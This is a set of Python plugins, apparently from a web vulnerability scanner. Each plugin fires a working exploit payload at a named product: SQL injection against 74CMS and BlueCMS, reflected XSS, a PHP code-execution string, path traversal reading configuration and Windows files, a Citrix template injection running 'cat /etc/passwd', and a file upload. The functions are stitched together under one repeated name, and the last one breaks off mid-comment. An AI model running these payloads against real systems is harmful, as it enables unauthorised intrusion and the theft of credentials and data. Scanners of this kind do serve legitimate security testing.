        payload_url = base + payload
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        response = session.get(payload_url, headers=request_headers,
                               timeout=6, verify=False)
        body = response.text
        status = response.status_code
        if status == 200 and '" autofocus onfocus=alert(1) style=' in body:
            Medusa = "{}存在74CMS存在反射型XSS漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            details = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity levels: serious = critical, High = high,
            # Intermediate = medium, Low = low.
            details.Low()
            return str(finding.info)
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
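def medusa(Url,RandomAgent,UnixTimestamp):
    """Check one target for a boolean-based SQL-injection difference.

    Requests the same ``/admin/index.php`` message endpoint twice, once with
    an always-false and once with an always-true condition appended to
    ``id``. A finding is reported when both replies are HTTP 200, the bodies
    differ, and each contains its expected message.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "42%20and%201=2"
        payload2="42%20and%201=1"
        # Both requests share the endpoint and differ only in the id value.
        endpoint = scheme + "://" + url +":"+ str(port) +"/admin/index.php?n=message&m=web&c=message&a=domessage&action=add&lang=cn&para137=1&para186=1&para138=1&para139=1&para140=1&id="
        payload_url = endpoint + payload
        payload_url2 = endpoint + payload2
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        # verify=False: the target's TLS certificate is not validated.
        resp = s.get(payload_url, headers=headers, timeout=6,  verify=False)
        resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
        con = resp.text
        con2 = resp2.text
        code = resp.status_code
        # The second status must come from the second response; reading it
        # from the first would let a failed second request count as a 200.
        code2 = resp2.status_code
        if code== 200 and code2== 200 and con.find('反馈已经被关闭') != -1 and con2.find('验证码错误') != -1 and con!=con2:
            Medusa = "{}存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}\r\n{}".format(url,payload_url,con,con2)
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, _)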
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target's ``/search.php`` for a command-execution finding.

    POSTs a fixed search form and reports a finding when the reply is
    HTTP 200 and the body contains all of ``System``, ``Compiler``,
    ``Build Date``, ``IPv6 Support`` and ``Configure Command``.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        proxies: Proxy setting, normalised by ``ClassCongregation.Proxies``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails``.
    """
    proxies=ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/search.php"
        base = scheme + "://" + url +":"+ str(port)
        payload_url = base + payload
        payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();"
        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': scheme+'://'+url,
            'Referer':payload
        }

        # verify=False: the target's TLS certificate is not validated.
        response = requests.post(payload_url, headers=request_headers,
                                 data=payload_data, proxies=proxies,
                                 timeout=5, verify=False)
        body = response.text
        status = response.status_code
        expected_markers = ('System', 'Compiler', 'Build Date',
                            'IPv6 Support', 'Configure Command')
        if status == 200 and all(marker in body for marker in expected_markers):
            Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,body.encode(encoding='utf-8'))
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(finding.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Call the log-writer class.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url,RandomAgent,UnixTimestamp):
    """Check one target for a time-based SQL-injection delay.

    Times a baseline request to ``available_seat.php`` and a second request
    that appends ``AND sleep(5)``. A finding is reported when the second
    request takes more than four seconds longer than the first.

    NOTE(review): both requests use ``timeout=6``, and a single timing pair
    is sensitive to network jitter - presumably this can mis-report on slow
    links; confirm against real targets.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        RandomAgent: Value sent as the ``User-Agent`` header.
        UnixTimestamp: Forwarded to ``VulnerabilityDetails`` with the finding.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload1 = "/available_seat.php?hid_Busid=2"
        payload2 = "/available_seat.php?hid_Busid=2 AND sleep(5)"
        base = scheme + "://" + url +":"+ str(port)
        payload_url1 = base + payload1
        payload_url2 = base + payload2

        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False: the target's TLS certificate is not validated.
        started = time.time()
        requests.get(payload_url1, headers=request_headers, timeout=6, verify=False)
        baseline_done = time.time()
        delayed_response = requests.get(payload_url2, headers=request_headers,
                                        timeout=6, verify=False)
        delayed_done = time.time()
        baseline_elapsed = baseline_done - started
        delayed_elapsed = delayed_done - baseline_done
        body = delayed_response.text
        if (delayed_elapsed - baseline_elapsed) > 4:
            Medusa = "{}存在AdvancedBusBooking脚本SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(url,payload_url2,body)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(finding.info, url,UnixTimestamp).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Call the log-writer class with the URL and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check one target for the Wuche library system file-listing finding.

    POSTs a fixed form to ``/5clib/kindaction.action`` whose ``subkind``
    names ``c:/windows`` and reports a finding when the reply is HTTP 200
    and the body contains ``system.ini``.

    Args:
        Url: Target URL, split into scheme, host and port by ``UrlProcessing``.
        Headers: Request headers passed to ``requests.post`` as given.
        proxies: Proxy setting, normalised by ``ClassCongregation.Proxies``.
        **kwargs: Forwarded unchanged to ``VulnerabilityDetails``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port only when the URL carried none.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/5clib/kindaction.action"
        data = "filePath=&kind=music&curpage=1&actionName=&subkind=c:/windows&pagesize=20&curPage=1&toPage=1"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload

        # verify=False: the target's TLS certificate is not validated.
        response = requests.post(payload_url,
                                 data=data,
                                 headers=Headers,
                                 proxies=proxies,
                                 timeout=6,
                                 verify=False)
        body = response.text
        status = response.status_code
        if status == 200 and 'system.ini' in body:
            Medusa = "{}存在五车图书管理系统存在任意文件遍历漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Pass in the url and the scan data.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Call the log-writer class.
        ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + plugin_name + " || Target Url:" + url, e)
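def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for an exposed management/status page.

    Every path in the module-level ``payloads`` is POSTed with the
    module-level ``post_data`` (both are defined outside this block). A
    finding is recorded when the reply body contains both
    ``a8 management monitor`` and ``connections stack trace``
    (case-insensitive). The HTTP status code is not part of the decision.

    Args:
        Url: Target address; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors go to the ClassCongregation writers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80

    # The headers do not depend on the payload, so build them once.
    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'User-Agent': RandomAgent,
    }
    for payload in payloads:
        try:
            payload_url = scheme + "://" + url + ':' + str(port) + payload
            # verify=False turns certificate validation off, so the reply is
            # not authenticated; a hit should be confirmed before it is acted on.
            resp = requests.post(payload_url,
                                 data=post_data,
                                 headers=headers,
                                 timeout=5,
                                 verify=False)
            con = resp.text.lower()
            if 'a8 management monitor' in con and 'connections stack trace' in con:
                # NOTE(review): post_data is written into the report; if it
                # holds credentials, the report store needs matching protection.
                Medusa = "{} 存在用友OA_status存在默认密码漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(
                    url, payload_url, post_data)
                _t = VulnerabilityInfo(Medusa)
                # Store the finding together with the target host.
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()
                # Also write it to a file; the target host is used as the file name.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
        except Exception:
            # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
            # SystemExit and made a running scan impossible to stop cleanly.
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # log target and plugin name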
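def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check one target for reflected markup in ``/aasp_includes/pages/notice.php``.

    A random token is embedded in an HTML fragment passed through the ``e``
    query parameter. A finding is recorded when the reply is HTTP 200 and the
    same fragment comes back unescaped in the body.

    The original compared the body against a ``<script>alert(...)</script>``
    string that was never part of the request, so a reflecting target could
    not match. The comparison now uses the fragment that is actually sent.

    Args:
        Url: Target address; split by ClassCongregation.UrlProcessing.
        Headers: Request headers, sent exactly as given.
        proxies: Proxy setting, normalised through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors go to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        # A per-request random token avoids matching static page content.
        RD = ClassCongregation.randoms().result(20)
        marker = "<img src=x onerror=alert('{}')>".format(RD)
        payload = "/aasp_includes/pages/notice.php?e=1" + marker
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        # verify=False turns certificate validation off, so the reply is not
        # authenticated; treat a hit as a lead to confirm.
        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        # Only an unescaped echo counts; an HTML-encoded echo will not contain
        # the marker verbatim.
        if code == 200 and marker in con:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Store the finding together with the target host.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()
            # Also write it to a file; the target host is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Log the failing plugin and target along with the exception.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)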
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for SQL injection in ``/upload/plus/ajax_street.php``.

    One GET is sent with a crafted ``key`` parameter. A finding is recorded
    when a fixed 32-hex-digit marker appears in the reply body. The HTTP
    status code is not part of the decision.

    Args:
        Url: Target address; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors go to the ClassCongregation writers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Use the scheme's default port; any other scheme leaves it unset.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        base = scheme + "://" + url + ":" + str(port)
        payload = "/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),1,1))=97 as signed) %23"
        payload_url = base + payload
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        # verify=False turns certificate validation off, so the reply is not
        # authenticated; treat a hit as a lead to confirm.
        reply = session.get(payload_url,
                            headers=request_headers,
                            timeout=6,
                            verify=False)
        body = reply.text
        # NOTE(review): presumably this digest only shows up when the injected
        # expression is evaluated by the database; confirm against a known-good
        # and a known-vulnerable instance to rule out false positives.
        if '4a8a08f09d37b73795649038408b5f33' in body:
            report = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(report)
            # Store the finding together with the target host.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, UnixTimestamp).Write()
            # Also write it to a file; the target host is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Log the target and the failing plugin name; the exception is dropped.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, ProxyIp):
    """Check one target for file disclosure through ``/admin/databack/download.html``.

    One GET asks the download endpoint for a path outside its own directory.
    A finding is reported when the reply is HTTP 200 and the body contains
    the text ``数据库名``.

    Args:
        Url: Target address; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        ProxyIp: Accepted but not used by this check.

    Returns:
        ``str(info)`` of the finding on a hit, otherwise None.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Use the scheme's default port; any other scheme leaves it unset.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        base = scheme + "://" + url + ":" + str(port)
        payload = "/admin/databack/download.html?name=../application/database.php"
        payload_url = base + payload

        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        # verify=False turns certificate validation off, so the reply is not
        # authenticated; treat a hit as a lead to confirm.
        reply = session.get(payload_url,
                            headers=request_headers,
                            timeout=6,
                            verify=False)
        body = reply.text
        if reply.status_code == 200 and "数据库名" in body:
            # NOTE(review): the whole body goes into the finding; for a
            # configuration file that presumably includes database credentials,
            # so whatever stores the finding needs matching access control.
            report = "{}存在BearAdmin任意文件下载漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(report)
            severity = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity methods: serious = critical, High = high,
            # Intermediate = medium, Low = low.
            severity.High()
            return str(finding.info)
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Log the target and the failing plugin name; the exception is dropped.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for a file-download weakness using the module-level ``payload``.

    One GET is sent to the path held in ``payload`` (defined outside this
    block). A finding is recorded when the reply is HTTP 200 and the body
    matches ``No error in <b>...</b>``.

    Args:
        Url: Target address; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors go to the ClassCongregation writers.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Use the scheme's default port; any other scheme leaves it unset.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        base = scheme + "://" + url + ':' + str(port)
        payload_url = base + payload
        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        # verify=False turns certificate validation off, so the reply is not
        # authenticated; treat a hit as a lead to confirm.
        reply = requests.get(payload_url,
                             headers=request_headers,
                             timeout=5,
                             verify=False)
        body = reply.text
        # The pattern is only evaluated for a 200 reply, as in a nested test.
        if reply.status_code == 200 and re.search(
                r'No error in <b>([^<]+)</b>', body):
            report = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            finding = VulnerabilityInfo(report)
            # Store the finding together with the target host.
            ClassCongregation.VulnerabilityDetails(
                finding.info, url, UnixTimestamp).Write()
            # Also write it to a file; the target host is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        # Log the target and the failing plugin name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, ProxyIp):
    """Check one target for SQL injection in ``/ad_js.php``.

    One GET is sent with a crafted ``ad_id`` parameter. A finding is reported
    when a fixed 32-hex-digit marker appears in the reply body. The HTTP
    status code is not part of the decision.

    Args:
        Url: Target address; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        ProxyIp: Accepted but not used by this check.

    Returns:
        ``str(info)`` of the finding on a hit, otherwise None.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        # Use the scheme's default port; any other scheme leaves it unset.
        port = {'https': 443, 'http': 80}.get(scheme)
    try:
        base = scheme + "://" + url + ":" + str(port)
        payload = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)"
        payload_url = base + payload

        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        # verify=False turns certificate validation off, so the reply is not
        # authenticated; treat a hit as a lead to confirm.
        reply = session.get(payload_url,
                            headers=request_headers,
                            timeout=6,
                            verify=False)
        body = reply.text
        # NOTE(review): presumably the digest of the literal in the query, which
        # the page would only print if the database evaluated it; confirm.
        if "63e1f04640e83605c1d177544a5a0488" in body:
            report = "{}存在BlueCMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, body)
            finding = VulnerabilityInfo(report)
            severity = ClassCongregation.VulnerabilityDetails(finding.info)
            # Severity methods: serious = critical, High = high,
            # Intermediate = medium, Low = low.
            severity.High()
            return str(finding.info)
    except Exception:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        # Log the target and the failing plugin name; the exception is dropped.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Two-request check that the finding text labels a Citrix remote code execution.

    Step 1 POSTs to ``/vpn/../vpns/portal/scripts/newbm.pl`` with a random
    title. Step 2, attempted only when step 1 returns HTTP 200 containing
    ``parent.window.ns_reload``, GETs ``/vpn/../vpns/portal/<random>.xml`` and
    records a finding when that reply is HTTP 200 and contains ``root:``,
    ``bin:`` and ``/root``.

    NOTE(review): both ``NSC_USER`` values are masked as ``"******"`` in this
    listing. The mask contains no ``{}`` placeholder, so ``.format(randoms)``
    is a no-op and the check cannot succeed as shown.
    NOTE(review): step 2 reads back a file named after the random title, so a
    positive check presumably leaves that file on the appliance. Nothing here
    removes it; operators should plan clean-up and record the file name.

    Args:
        Url: Target address; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors go to the ClassCongregation writers.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    # Built outside the try block: a failure here propagates to the caller.
    payload = "/vpn/../vpns/portal/scripts/newbm.pl"
    payload_url = scheme + "://" + url + ":" + str(port) + payload
    randoms = rand()
    try:
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            "Connection": "close",
            "NSC_USER":
            "******".format(randoms),
            "NSC_NONCE": "nsroot"
        }
        data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format(
            randoms)
        # verify=False turns certificate validation off, so neither reply is
        # authenticated; treat a hit as a lead to confirm.
        resp = requests.post(payload_url,
                             data=data,
                             headers=headers,
                             proxies=proxies,
                             timeout=5,
                             verify=False,
                             allow_redirects=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("parent.window.ns_reload") != -1:
            payload_url2 = scheme + "://" + url + ":" + str(
                port) + '/vpn/../vpns/portal/{}.xml'.format(randoms)
            headers2 = {
                "NSC_USER": "******",
                "NSC_NONCE": "nsroot",
                "Upgrade-Insecure-Requests": "1",
                "Cache-Control": "max-age=0",
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'Accept-Language': 'en',
                'User-Agent': RandomAgent,
            }
            resp2 = requests.get(payload_url2,
                                 headers=headers2,
                                 proxies=proxies,
                                 timeout=5,
                                 verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # Three independent substrings must all be present, which narrows
            # the chance of a match on an unrelated page.
            if code2 == 200 and con2.find("root:") != -1 and con2.find(
                    "bin:") != -1 and con2.find("/root") != -1:
                # The report embeds the second response body, i.e. account data
                # read from the target; protect the report store accordingly.
                Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format(
                    url, payload_url2, data, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, **kwargs).Write()  # store the finding with the target host
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # write to file; the target host is the file name, Medusa is the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log the target and the failing plugin name


# if __name__ == '__main__':
#
#     with open(r'../123.txt', 'r') as file:
#         content_lists = file.readlines()
#         url = [x.strip() for x in content_lists]
#         for l in url:
#             medusa(l)
#medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def Monitor():
    """Poll the GitHub repository search API and mirror the hits into GithubCve.

    The search term is the module-level ``github_cve_monitor_key`` (defined
    outside this block). For each returned repository the row is updated when
    ``Judgment()`` reports that it already exists, otherwise it is written.
    Any exception is logged through ClassCongregation.ErrorLog and swallowed.

    NOTE(review): the request is unauthenticated and the HTTP status is not
    checked. A rate-limited or error reply presumably lacks ``items`` and ends
    up in the error log as a KeyError rather than as a clear message.
    NOTE(review): the search term is concatenated into the URL without
    URL-encoding; confirm it can never contain ``&`` or ``#``.
    """
    try:
        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36",
        }
        search_url = ("https://api.github.com/search/repositories?q=" +
                      github_cve_monitor_key + "&sort=updated&order=desc")
        GitCveApi = requests.get(search_url,
                                 headers=request_headers,
                                 timeout=10)
        repositories = json.loads(GitCveApi.text)["items"]

        def _as_timestamp(stamp):
            # Parse the API time string, move it to Beijing time, then turn it
            # into a timestamp string.
            # NOTE(review): time.mktime() reads the tuple in the host's local
            # zone, so this is true epoch time only on an Asia/Shanghai host.
            localized = dateutil.parser.parse(stamp).astimezone(
                pytz.timezone('Asia/Shanghai'))
            return str(int(time.mktime(localized.timetuple())))

        for repo in repositories:
            # Fields are read in a fixed order so that a missing key surfaces
            # the same way on every run.
            record = {
                "id": repo["id"],
                "name": repo["name"],
                "html_url": repo["html_url"],
                "created_at": _as_timestamp(repo["created_at"]),
                "updated_at": _as_timestamp(repo["updated_at"]),
                "pushed_at": _as_timestamp(repo["pushed_at"]),
                "forks_count": repo["forks_count"],
                "watchers_count": repo["watchers_count"],
            }
            # Query the database first, then update or insert.
            already_known = GithubCve(**record).Judgment()
            if already_known:
                GithubCve(**record).Update()
            else:
                GithubCve(**record).Write()

    except Exception as e:
        ClassCongregation.ErrorLog().Write(
            "Web_CVE_GithubMonitoring_Github_Monitor(def)", e)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Check one target for unrestricted upload through ``img_save.asp``.

    Step 1 POSTs a form body carrying a ``.cer`` file whose content is the
    marker ``testvul``. Step 2, attempted only when the reply names a stored
    ``<digits>.cer`` file, GETs that file from ``NewImage/`` and records a
    finding when it is served with HTTP 200 and still contains the marker.

    NOTE(review): the probe stores a file on the target and nothing here
    removes it. Operators should record ``payload_url2`` and plan clean-up.

    Args:
        Url: Target address; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        UnixTimestamp: Passed through to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors go to the ClassCongregation writers.
    """

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        # Hand-written multipart body; the literal must stay byte-for-byte.
        data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert

testvul
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"

提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"

baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"

45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''
        # NOTE(review): the body is multipart-formatted, but Content-Type below
        # declares application/x-www-form-urlencoded and carries no boundary.
        # Confirm the target parses this; otherwise the check under-reports.
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        # verify=False turns certificate validation off, so neither reply is
        # authenticated; treat a hit as a lead to confirm.
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        # Extract the stored file name from the reply. The '.' before 'cer' is
        # unescaped, so it matches any character there.
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = scheme + "://" + url + ":" + str(
                port) + "/library/editornew/Editor/NewImage/" + match.group(1)
            resp2 = s.get(payload_url2,
                          headers=headers,
                          timeout=6,
                          verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # Only the inert marker string is uploaded. The author notes that the
            # same request would carry any other content, which is why a hit is
